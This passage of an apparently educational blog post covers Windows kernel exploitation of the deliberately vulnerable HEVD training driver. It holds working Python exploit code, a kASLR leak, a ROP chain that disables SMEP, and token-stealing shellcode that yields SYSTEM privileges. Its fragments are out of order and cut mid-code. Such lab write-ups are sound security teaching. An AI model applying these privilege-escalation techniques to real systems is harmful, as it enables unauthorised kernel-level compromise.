b'\\\\x00\\\\x00\\\\x89\\\\xc1\\\\x8b\\\\x89\\\\xb8\\\\x00\\\\x00\\\\x00\\\\x81\\\\xe9\\\\xb8\\\\x00\\\\x00\\\\x00\\\\x39'\\n    b'\\\\x91\\\\xb4\\\\x00\\\\x00\\\\x00\\\\x75\\\\xec\\\\x89\\\\xcf\\\\x89\\\\xc1\\\\x8b\\\\x89\\\\xb8\\\\x00\\\\x00\\\\x00'\\n    b'\\\\x81\\\\xe9\\\\xb8\\\\x00\\\\x00\\\\x00\\\\x83\\\\xb9\\\\xb4\\\\x00\\\\x00\\\\x00\\\\x04\\\\x75\\\\xeb\\\\x81\\\\xc1'\\n    
b'\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x8b\\\\x09\\\\x89\\\\x8f\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x61\\\\x31\\\\xc0\\\\x40\\\\x83'\\n    b'\\\\xc4\\\\x10\\\\x5d\\\\xc2\\\\x08\\\\x00'\\n)\\n\\nprint('Allocating memory for shellcode...')\\nRET_PTR = KERNEL32.VirtualAlloc(\\n    c_int(0),                    # lpAddress\\n    c_int(len(SHELLCODE)),       # dwSize\\n    c_int(0x3000),               # flAllocationType = MEM_COMMIT | MEM_RESERVE\\n    c_int(0x40)                  # flProtect = PAGE_EXECUTE_READWRITE\\n)\\n\\nprint('Moving shellcode to heap...')\\nKERNEL32.RtlMoveMemory(\\n    c_int(RET_PTR),              # Destination\\n    SHELLCODE,                   # Source\\n    c_int(len(SHELLCODE))        # Length\\n)\\n\\nprint('Creating ROP chain...')\\nROP_CHAIN = (\\n    struct.pack('<L', BASE_ADDRESS + 0x0002bbef) +     #  pop eax # ret\\n    struct.pack('<L', 0x42424242) +                    #  Padding for ret 8\\n    struct.pack('<L', 0x42424242) +                    #\\n    struct.pack('<L', 0x000406e9) +                    #  Value to disable SMEP\\n    struct.pack('<L', BASE_ADDRESS + 0x0011f8de) +     #  mov cr4, eax # ret\\n    struct.pack('<L', RET_PTR)                         #  Pointer to shellcode\\n)\\n\\nPAYLOAD = (\\n    b'A' * 2080 +\\n    ROP_CHAIN\\n)\\n\\nSIZE = len(PAYLOAD)\\n\\nprint('Opening driver handle...')\\nHANDLE = DeviceIoControl(DEVICE_NAME)\\nprint('Sending payload...')\\nHANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)\\nprint('Done.')\\n\\nsys.exit(0)\",language:\"Python\"})})}),/*#__PURE__*/e(\"p\",{children:\"And check it:\"}),/*#__PURE__*/e(\"img\",{alt:\"Success to steal SYSTEM\",className:\"framer-image\",height:\"428\",src:\"https://framerusercontent.com/images/w68au5R5zQoFcuRt0AaugeKaB0.gif\",srcSet:\"https://framerusercontent.com/images/w68au5R5zQoFcuRt0AaugeKaB0.gif?scale-down-to=512 512w,https://framerusercontent.com/images/w68au5R5zQoFcuRt0AaugeKaB0.gif?scale-down-to=1024 
1024w,https://framerusercontent.com/images/w68au5R5zQoFcuRt0AaugeKaB0.gif 1026w\",style:{aspectRatio:\"1026 / 856\"},width:\"513\"}),/*#__PURE__*/t(\"p\",{children:[\"Glorious! We were able to steal the token of the \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" process and copy it to our \",/*#__PURE__*/e(\"code\",{children:\"cmd.exe\"}),\" shell. Now, we own the system!\"]}),/*#__PURE__*/e(\"h2\",{children:\"Conclusions\"}),/*#__PURE__*/t(\"p\",{children:[\"It was fun to steal the \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" process token and pass it to our own parent process. There are many other ways of gaining Local Privilege Escalation but this method is one of the most used because it is extremely reliable if you can restore the execution of the kernel.\"]})]});export const richText1=/*#__PURE__*/t(i.Fragment,{children:[/*#__PURE__*/t(\"p\",{children:[\"During the last posts, we\u2019ve been dealing with exploitation in Windows Kernel space. We are using \",/*#__PURE__*/e(r,{href:\"https://github.com/hacksysteam/HackSysExtremeVulnerableDriver\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"HackSys Extremely Vulnerable Driver\"})}),\" or \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\" as the target which is composed of several vulnerabilities to let practitioners sharpen the Windows Kernel exploitation skills.\"]}),/*#__PURE__*/t(\"p\",{children:[\"In the last \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/hevd-dos/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"post\"})}),\", we successfully created a DoS exploit leveraging a stack overflow vulnerability in \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\". 
The DoS occurred because we placed an arbitrary value on \",/*#__PURE__*/e(\"code\",{children:\"EIP\"}),\" (\",/*#__PURE__*/e(\"code\",{children:\"41414141\"}),\") and when the OS tried to access that memory address, it was not accessible.\"]}),/*#__PURE__*/t(\"p\",{children:[\"In this article, we will use that ability to overwrite \",/*#__PURE__*/e(\"code\",{children:\"EIP\"}),\" to execute code in privileged mode.\"]}),/*#__PURE__*/t(\"p\",{children:[\"During the exploitation process, we will come across Supervisor Mode Execution Prevention or \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\", which will thwart our exploit. But fear not: we will be able to bypass it.\"]})]});export const richText2=/*#__PURE__*/t(i.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"Local vs Remote exploitation\"}),/*#__PURE__*/t(\"p\",{children:[\"When we were exploiting Vulnserver, we were doing remote exploitation of a user-space application. That kind of environment has certain specific restrictions; the most notorious are limited buffer space to insert our payload, character restrictions and \",/*#__PURE__*/e(\"code\",{children:\"ASLR\"}),\" (Address Space Layout Randomization).\"]}),/*#__PURE__*/t(\"p\",{children:[\"When we are exploiting the Windows Kernel, it is assumed that we already have unprivileged local access to the target machine. In that environment, those restrictions are no longer a major issue. 
For example, the buffer space problem and character restrictions are easily circumvented by allocating dynamic memory with \",/*#__PURE__*/e(\"code\",{children:\"VirtualAlloc()\"}),\", moving the raw payload to that buffer and overwriting \",/*#__PURE__*/e(\"code\",{children:\"EIP\"}),\" with the returned pointer.\"]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"ASLR\"}),\" and \",/*#__PURE__*/e(\"code\",{children:\"kASLR\"}),\" (Kernel \",/*#__PURE__*/e(\"code\",{children:\"ASLR\"}),\") are not an issue either, because they work by randomizing the base address of the modules at every restart, but if we have local access, there are functions in the Windows API that will reveal the current kernel base address.\"]}),/*#__PURE__*/t(\"p\",{children:[\"However, other protections come into play when trying to exploit at kernel level, like \",/*#__PURE__*/e(\"code\",{children:\"DEP\"}),\", \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\", \",/*#__PURE__*/e(\"code\",{children:\"CFG\"}),\", etc. We will surely come across some of them later. 
Stay tuned.\"]}),/*#__PURE__*/e(\"h2\",{children:\"Stack Overflow exploitation\"}),/*#__PURE__*/t(\"p\",{children:[\"We left off our \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/hevd-dos/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"previous article\"})}),\" performing a DoS to the target machine, on where we used the following exploit:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:'#!/usr/bin/env python3\\n\"\"\"\\nHackSysExtremeVulnerableDrive Stack Overflow.\\n\\nVulnerable Software: HackSysExtremeVulnerableDrive\\nVersion: 3.00\\nExploit Author: Andres Roldan\\nTested On: Windows 10 1703\\nWriteup: https://fluidattacks.com/blog/hevd-smep-bypass/\\n\"\"\"\\n\\nfrom infi.wioctl import DeviceIoControl\\n\\nDEVICE_NAME = r\\'\\\\\\\\.\\\\HackSysExtremeVulnerableDriver\\'\\n\\nIOCTL_HEVD_STACK_OVERFLOW = 0x222003\\nSIZE = 3000\\n\\nPAYLOAD = (\\n    b\\'A\\' * SIZE\\n)\\n\\nHANDLE = DeviceIoControl(DEVICE_NAME)\\nHANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)',language:\"Python\"})})}),/*#__PURE__*/t(\"p\",{children:[\"And we were able to overwrite \",/*#__PURE__*/e(\"code\",{children:\"EIP\"}),\" with the value \",/*#__PURE__*/e(\"code\",{children:\"41414141\"}),\". If we are going to perform something more interesting, we must start by locating the exact offset on which \",/*#__PURE__*/e(\"code\",{children:\"EIP\"}),\" is overwritten. Just like on any other user-space exploitation process, we can create a cyclic pattern to find that offset. 
We can use \",/*#__PURE__*/e(\"code\",{children:\"mona\"}),\" to do that:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Using mona\",className:\"framer-image\",height:\"266\",src:\"https://framerusercontent.com/images/UCiBwXbSVyPC9UxJB4jbkTnlNRk.gif\",srcSet:\"https://framerusercontent.com/images/UCiBwXbSVyPC9UxJB4jbkTnlNRk.gif?scale-down-to=512 512w,https://framerusercontent.com/images/UCiBwXbSVyPC9UxJB4jbkTnlNRk.gif?scale-down-to=1024 1024w,https://framerusercontent.com/images/UCiBwXbSVyPC9UxJB4jbkTnlNRk.gif 1239w\",style:{aspectRatio:\"1239 / 532\"},width:\"619\"}),/*#__PURE__*/e(\"p\",{children:\"Then, update our exploit:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:'#!/usr/bin/env python3\\n\"\"\"\\nHackSysExtremeVulnerableDrive Stack Overflow.\\n\\nVulnerable Software: HackSysExtremeVulnerableDrive\\nVersion: 3.00\\nExploit Author: Andres Roldan\\nTested On: Windows 10 1703\\nWriteup: https://fluidattacks.com/blog/hevd-smep-bypass/\\n\"\"\"\\n\\nfrom infi.wioctl import DeviceIoControl\\n\\nDEVICE_NAME = r\\'\\\\\\\\.\\\\HackSysExtremeVulnerableDriver\\'\\n\\nIOCTL_HEVD_STACK_OVERFLOW = 0x222003\\n\\nPAYLOAD = (\\n b\\'<insert pattern here>\\'\\n)\\n\\nSIZE = len(PAYLOAD)\\n\\nHANDLE = DeviceIoControl(DEVICE_NAME)\\nHANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)',language:\"Python\"})})}),/*#__PURE__*/e(\"p\",{children:\"And check it:\"}),/*#__PURE__*/e(\"img\",{alt:\"Checking updated exploit with mona\",className:\"framer-image\",height:\"790\",src:\"https://framerusercontent.com/images/m86dB5VIdUv3IjErcTYghLvdt74.gif\",srcSet:\"https://framerusercontent.com/images/m86dB5VIdUv3IjErcTYghLvdt74.gif?scale-down-to=1024 791w,https://framerusercontent.com/images/m86dB5VIdUv3IjErcTYghLvdt74.gif 1222w\",style:{aspectRatio:\"1222 / 
1581\"},width:\"611\"}),/*#__PURE__*/t(\"p\",{children:[\"Good, \",/*#__PURE__*/e(\"code\",{children:\"mona\"}),\" discovered that EIP gets overwritten starting at byte \",/*#__PURE__*/e(\"code\",{children:\"2080\"}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"Now, for illustration purposes, we\u2019ll create a simple shellcode to make \",/*#__PURE__*/e(\"code\",{children:\"EAX = 0xdeadbeef\"}),\". Then, we must copy it in a dynamic generated location created by \",/*#__PURE__*/e(\"code\",{children:\"VirtualAlloc()\"}),\". The return value of \",/*#__PURE__*/e(\"code\",{children:\"VirtualAlloc()\"}),\" is a pointer that will be placed starting at byte 2081 of our buffer to divert the execution flow to our shellcode.\"]}),/*#__PURE__*/e(\"p\",{children:\"Let\u2019s update our exploit with that:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"#!/usr/bin/env python3\\n\\\"\\\"\\\"\\nHackSysExtremeVulnerableDrive Stack Overflow.\\n\\nVulnerable Software: HackSysExtremeVulnerableDrive\\nVersion: 3.00\\nExploit Author: Andres Roldan\\nTested On: Windows 10 1703\\nWriteup: https://fluidattacks.com/blog/hevd-smep-bypass/\\n\\\"\\\"\\\"\\n\\nimport struct\\nfrom ctypes import windll, c_int\\nfrom infi.wioctl import DeviceIoControl\\n\\nKERNEL32 = windll.kernel32\\nDEVICE_NAME = r'\\\\\\\\.\\\\HackSysExtremeVulnerableDriver'\\nIOCTL_HEVD_STACK_OVERFLOW = 0x222003\\n\\nSHELLCODE = (\\n b'\\\\xb8\\\\xef\\\\xbe\\\\xad\\\\xde' + # mov eax,0xdeadbeef\\n b'\\\\xcc' # INT3 -> software breakpoint\\n)\\n\\nRET_PTR = KERNEL32.VirtualAlloc(\\n    c_int(0),                    # lpAddress\\n    c_int(len(SHELLCODE)),       # dwSize\\n    c_int(0x3000),               # flAllocationType = MEM_COMMIT | MEM_RESERVE\\n    c_int(0x40)                  # flProtect = 
PAGE_EXECUTE_READWRITE\\n)\\n\\nKERNEL32.RtlMoveMemory(\\n    c_int(RET_PTR),              # Destination\\n    SHELLCODE,                   # Source\\n    c_int(len(SHELLCODE))        # Length\\n)\\n\\nPAYLOAD = (\\n    b'A' * 2080 +\\n    struct.pack('<L', RET_PTR)\\n)\\n\\nSIZE = len(PAYLOAD)\\n\\nHANDLE = DeviceIoControl(DEVICE_NAME)\\nHANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)\",language:\"Python\"})})}),/*#__PURE__*/t(\"p\",{children:[\"If everything comes as expected, \",/*#__PURE__*/e(\"code\",{children:\"EAX\"}),\" will have the value \",/*#__PURE__*/e(\"code\",{children:\"0xdeadbeef\"}),\" and execution will pause at the inserted breakpoint \",/*#__PURE__*/e(\"code\",{children:\"\\\\xcc\"}),\". Let\u2019s check it:\"]}),/*#__PURE__*/e(\"img\",{alt:\"SMEP protects the kernel\",className:\"framer-image\",height:\"468\",src:\"https://framerusercontent.com/images/TUOjmBCTm4CSftICUQdmZyKa0.gif\",srcSet:\"https://framerusercontent.com/images/TUOjmBCTm4CSftICUQdmZyKa0.gif 841w\",style:{aspectRatio:\"841 / 937\"},width:\"420\"}),/*#__PURE__*/e(\"p\",{children:\"Ouch!\"}),/*#__PURE__*/t(\"p\",{children:[\"Our exploit was thwarted and the error \",/*#__PURE__*/e(\"code\",{children:\"ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY\"}),\" was triggered when the first instruction of our shellcode was trying to execute. That means that \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\" did protect the kernel.\"]}),/*#__PURE__*/e(\"h2\",{children:\"SMEP: Supervisor Mode Execution Prevention\"}),/*#__PURE__*/t(\"p\",{children:[\"There\u2019s a concept called \",/*#__PURE__*/e(r,{href:\"https://en.wikipedia.org/wiki/Protection_ring\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"Protection rings\"})}),\" which is used by operating systems to delimit capabilities and provide fault tolerance, by defining levels of privileges. 
Windows OS versions use only 2 Current Privilege Levels (\",/*#__PURE__*/e(\"code\",{children:\"CPL\"}),\"): 0 and 3. \",/*#__PURE__*/e(\"code\",{children:\"CPL\"}),\" levels are also referred to as \",/*#__PURE__*/e(\"code\",{children:\"rings\"}),\". \",/*#__PURE__*/e(\"code\",{children:\"CPL0\"}),\" or \",/*#__PURE__*/e(\"code\",{children:\"ring-0\"}),\" is where the kernel is executed and \",/*#__PURE__*/e(\"code\",{children:\"CPL3\"}),\" or \",/*#__PURE__*/e(\"code\",{children:\"ring-3\"}),\" is where user mode instructions are performed.\"]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\" is a protection introduced at CPU-level which prevents the kernel from executing code belonging to \",/*#__PURE__*/e(\"code\",{children:\"ring-3\"}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"The \",/*#__PURE__*/e(\"code\",{children:\"ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY\"}),\" exception was triggered because \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\" is executing at \",/*#__PURE__*/e(\"code\",{children:\"ring-0\"}),\" and after overwriting \",/*#__PURE__*/e(\"code\",{children:\"EIP\"}),\", it was trying to run the instructions in our shellcode which was allocated at \",/*#__PURE__*/e(\"code\",{children:\"ring-3\"}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"Technically, \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\" is nothing but a bit in a CPU control register, specifically the 20th bit of the \",/*#__PURE__*/e(\"code\",{children:\"CR4\"}),\" control register:\"]}),/*#__PURE__*/e(\"img\",{alt:\"CR4 control register\",className:\"framer-image\",height:\"310\",src:\"https://framerusercontent.com/images/x67XE61jFGElmE7hoHP2KWli8.png\",srcSet:\"https://framerusercontent.com/images/x67XE61jFGElmE7hoHP2KWli8.png?scale-down-to=512 512w,https://framerusercontent.com/images/x67XE61jFGElmE7hoHP2KWli8.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/x67XE61jFGElmE7hoHP2KWli8.png 1920w\",style:{aspectRatio:\"1920 / 
620\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"To bypass \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\", we must flip that bit (make it \",/*#__PURE__*/e(\"code\",{children:\"0\"}),\"). As can be seen, the current value of \",/*#__PURE__*/e(\"code\",{children:\"CR4\"}),\" with \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\" enabled is \",/*#__PURE__*/e(\"code\",{children:\"001406e9\"}),\". Let\u2019s check what the value would be after flipping the 20th bit:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Flipping the 20th bit\",className:\"framer-image\",height:\"212\",src:\"https://framerusercontent.com/images/g0GTnEFRaVkOxug8W60Is3OrgCs.png\",srcSet:\"https://framerusercontent.com/images/g0GTnEFRaVkOxug8W60Is3OrgCs.png?scale-down-to=512 512w,https://framerusercontent.com/images/g0GTnEFRaVkOxug8W60Is3OrgCs.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/g0GTnEFRaVkOxug8W60Is3OrgCs.png 1920w\",style:{aspectRatio:\"1920 / 424\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"It would be \",/*#__PURE__*/e(\"code\",{children:\"000406e9\"}),\". We need to place that value in \",/*#__PURE__*/e(\"code\",{children:\"CR4\"}),\" to turn off \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"But, how can we do that if we are not allowed to execute instructions at \",/*#__PURE__*/e(\"code\",{children:\"ring-3\"}),\"? \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/bypassing-dep/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"ROP\"})}),\" comes to the rescue! We need to execute a \",/*#__PURE__*/e(\"code\",{children:\"ROP\"}),\" chain with instructions that are already in kernel mode. At \",/*#__PURE__*/e(\"code\",{children:\"ring-0\"}),\", \",/*#__PURE__*/e(\"code\",{children:\"ROP\"}),\" is often referred to as \",/*#__PURE__*/e(\"code\",{children:\"kROP\"}),\". 
We then need to execute a \",/*#__PURE__*/e(\"code\",{children:\"kROP\"}),\" chain and change the value of \",/*#__PURE__*/e(\"code\",{children:\"CR4\"}),\". With that, we should be able to make \",/*#__PURE__*/e(\"code\",{children:\"EAX = 0xdeadbeef\"}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"In \",/*#__PURE__*/e(\"code\",{children:\"nt!KeFlushCurrentTb\"}),\", we find a gadget that sets \",/*#__PURE__*/e(\"code\",{children:\"CR4\"}),\" from whatever value \",/*#__PURE__*/e(\"code\",{children:\"EAX\"}),\" may have: \",/*#__PURE__*/e(\"code\",{children:\"mov cr4, eax # ret\"})]}),/*#__PURE__*/e(\"img\",{alt:\"CR4 from EAX values \",className:\"framer-image\",height:\"242\",src:\"https://framerusercontent.com/images/11Cl9HDPyD5nJskD8rlHPEmJ8ow.png\",srcSet:\"https://framerusercontent.com/images/11Cl9HDPyD5nJskD8rlHPEmJ8ow.png?scale-down-to=512 512w,https://framerusercontent.com/images/11Cl9HDPyD5nJskD8rlHPEmJ8ow.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/11Cl9HDPyD5nJskD8rlHPEmJ8ow.png 1920w\",style:{aspectRatio:\"1920 / 484\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Now, we need to calculate the offset of that \",/*#__PURE__*/e(\"code\",{children:\"ROP\"}),\" gadget from the start of the \",/*#__PURE__*/e(\"code\",{children:\"nt\"}),\" module:\"]}),/*#__PURE__*/e(\"img\",{alt:\"nt module\",className:\"framer-image\",height:\"377\",src:\"https://framerusercontent.com/images/Ipt7iwEdUCPSYlkxd7Q0XFmL4.png\",srcSet:\"https://framerusercontent.com/images/Ipt7iwEdUCPSYlkxd7Q0XFmL4.png?scale-down-to=512 512w,https://framerusercontent.com/images/Ipt7iwEdUCPSYlkxd7Q0XFmL4.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/Ipt7iwEdUCPSYlkxd7Q0XFmL4.png 1920w\",style:{aspectRatio:\"1920 / 754\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"The offset is \",/*#__PURE__*/e(\"code\",{children:\"0011f8de\"}),\". 
We\u2019ll use that later.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Now we need to find a \",/*#__PURE__*/e(\"code\",{children:\"pop eax # ret\"}),\" gadget. We can find one at \",/*#__PURE__*/e(\"code\",{children:\"nt!_MapCMDevicePropertyToNtProperty+0x39\"}),\":\"]}),/*#__PURE__*/e(\"img\",{alt:\"nt!_MapCMDevicePropertyToNtProperty+0x39\",className:\"framer-image\",height:\"83\",src:\"https://framerusercontent.com/images/YkwBoNwJCZGhP9YeIrurh1uS6Q.png\",srcSet:\"https://framerusercontent.com/images/YkwBoNwJCZGhP9YeIrurh1uS6Q.png?scale-down-to=512 512w,https://framerusercontent.com/images/YkwBoNwJCZGhP9YeIrurh1uS6Q.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/YkwBoNwJCZGhP9YeIrurh1uS6Q.png 1920w\",style:{aspectRatio:\"1920 / 166\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"And the offset from the start of the \",/*#__PURE__*/e(\"code\",{children:\"nt\"}),\" module is \",/*#__PURE__*/e(\"code\",{children:\"0002bbef\"}),\":\"]}),/*#__PURE__*/e(\"img\",{alt:\"0002bbef\",className:\"framer-image\",height:\"157\",src:\"https://framerusercontent.com/images/iYrW0o90NJpwUx2cu0jcBKHPUIw.png\",srcSet:\"https://framerusercontent.com/images/iYrW0o90NJpwUx2cu0jcBKHPUIw.png?scale-down-to=512 512w,https://framerusercontent.com/images/iYrW0o90NJpwUx2cu0jcBKHPUIw.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/iYrW0o90NJpwUx2cu0jcBKHPUIw.png 1920w\",style:{aspectRatio:\"1920 / 314\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"We must remember to pad our \",/*#__PURE__*/e(\"code\",{children:\"ROP\"}),\" chain with 8 bytes because the overflowed function epilog uses \",/*#__PURE__*/e(\"code\",{children:\"ret 8\"}),\" which will return to the value pointed by \",/*#__PURE__*/e(\"code\",{children:\"ESP\"}),\" and then will pop 8 bytes from the stack:\"]}),/*#__PURE__*/e(\"img\",{alt:\"8 bytes from the 
stack\",className:\"framer-image\",height:\"102\",src:\"https://framerusercontent.com/images/qonilL2LUI1tp0x9GzFypkYzgUI.png\",srcSet:\"https://framerusercontent.com/images/qonilL2LUI1tp0x9GzFypkYzgUI.png?scale-down-to=512 512w,https://framerusercontent.com/images/qonilL2LUI1tp0x9GzFypkYzgUI.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/qonilL2LUI1tp0x9GzFypkYzgUI.png 1920w\",style:{aspectRatio:\"1920 / 204\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"With that, we can now disable \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\"!\"]}),/*#__PURE__*/e(\"h2\",{children:\"Defeating kASLR\"}),/*#__PURE__*/t(\"p\",{children:[\"We\u2019ve got all the required information to create the \",/*#__PURE__*/e(\"code\",{children:\"ROP\"}),\" chain to disable \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\". However, we need to deal with kernel \",/*#__PURE__*/e(\"code\",{children:\"ASLR\"}),\". As I mentioned before, there are several functions that can be executed in user mode (\",/*#__PURE__*/e(\"code\",{children:\"ring-3\"}),\") that can give information about addresses at \",/*#__PURE__*/e(\"code\",{children:\"ring-0\"}),\". The most used are \",/*#__PURE__*/e(\"code\",{children:\"NtQuerySystemInformation()\"}),\" and \",/*#__PURE__*/e(\"code\",{children:\"EnumDeviceDrivers()\"}),\". The latter is the simpler. 
With the following code, you can get the kernel base address:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:'import sys\\nfrom ctypes import windll, c_ulong, byref, sizeof\\n\\nPSAPI = windll.psapi\\n\\ndef get_kernel_base():\\n    \"\"\"Obtain kernel base address.\"\"\"\\n    buff_size = 0x4\\n\\n    base = (c_ulong * buff_size)(0)\\n\\n    if not PSAPI.EnumDeviceDrivers(base, sizeof(base), byref(c_ulong())):\\n        print(\\'Failed to get kernel base address.\\')\\n        sys.exit(1)\\n    return base[0]\\n\\nBASE_ADDRESS = get_kernel_base()\\nprint(f\\'Obtained kernel base address: {hex(BASE_ADDRESS)}\\')',language:\"Python\"})})}),/*#__PURE__*/e(\"p\",{children:\"And check it:\"}),/*#__PURE__*/e(\"img\",{alt:\"0x81e09000\",className:\"framer-image\",height:\"192\",src:\"https://framerusercontent.com/images/IYJi1acy2TW3TCuC1JJmkl7jPt0.png\",srcSet:\"https://framerusercontent.com/images/IYJi1acy2TW3TCuC1JJmkl7jPt0.png?scale-down-to=512 512w,https://framerusercontent.com/images/IYJi1acy2TW3TCuC1JJmkl7jPt0.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/IYJi1acy2TW3TCuC1JJmkl7jPt0.png 1920w\",style:{aspectRatio:\"1920 / 384\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"As you can see, it matches perfectly to the address reported by \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\":\"]}),/*#__PURE__*/e(\"img\",{alt:\"Perfect match\",className:\"framer-image\",height:\"92\",src:\"https://framerusercontent.com/images/BkIomoYW3GZVpM45aegSljpfo.png\",srcSet:\"https://framerusercontent.com/images/BkIomoYW3GZVpM45aegSljpfo.png?scale-down-to=512 512w,https://framerusercontent.com/images/BkIomoYW3GZVpM45aegSljpfo.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/BkIomoYW3GZVpM45aegSljpfo.png 
1920w\",style:{aspectRatio:\"1920 / 184\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"With that, we can update our exploit, adding the \",/*#__PURE__*/e(\"code\",{children:\"ROP\"}),\" chain to disable \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\", using the offsets of the gadgets and the value returned from that function to obtain absolute addresses, defeating \",/*#__PURE__*/e(\"code\",{children:\"kASLR\"}),\"!\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"#!/usr/bin/env python3\\n\\\"\\\"\\\"\\nHackSysExtremeVulnerableDrive Stack Overflow.\\n\\nVulnerable Software: HackSysExtremeVulnerableDrive\\nVersion: 3.00\\nExploit Author: Andres Roldan\\nTested On: Windows 10 1703\\nWriteup: https://fluidattacks.com/blog/hevd-smep-bypass/\\n\\\"\\\"\\\"\\n\\nimport struct\\nimport sys\\nfrom ctypes import windll, c_int, c_ulong, byref, sizeof\\nfrom infi.wioctl import DeviceIoControl\\n\\nKERNEL32 = windll.kernel32\\nPSAPI = windll.psapi\\nDEVICE_NAME = r'\\\\\\\\.\\\\HackSysExtremeVulnerableDriver'\\nIOCTL_HEVD_STACK_OVERFLOW = 0x222003\\n\\n\\ndef get_kernel_base():\\n \\\"\\\"\\\"Obtain kernel base address.\\\"\\\"\\\"\\n buff_size = 0x4\\n\\n base = (c_ulong * buff_size)(0)\\n\\n if not 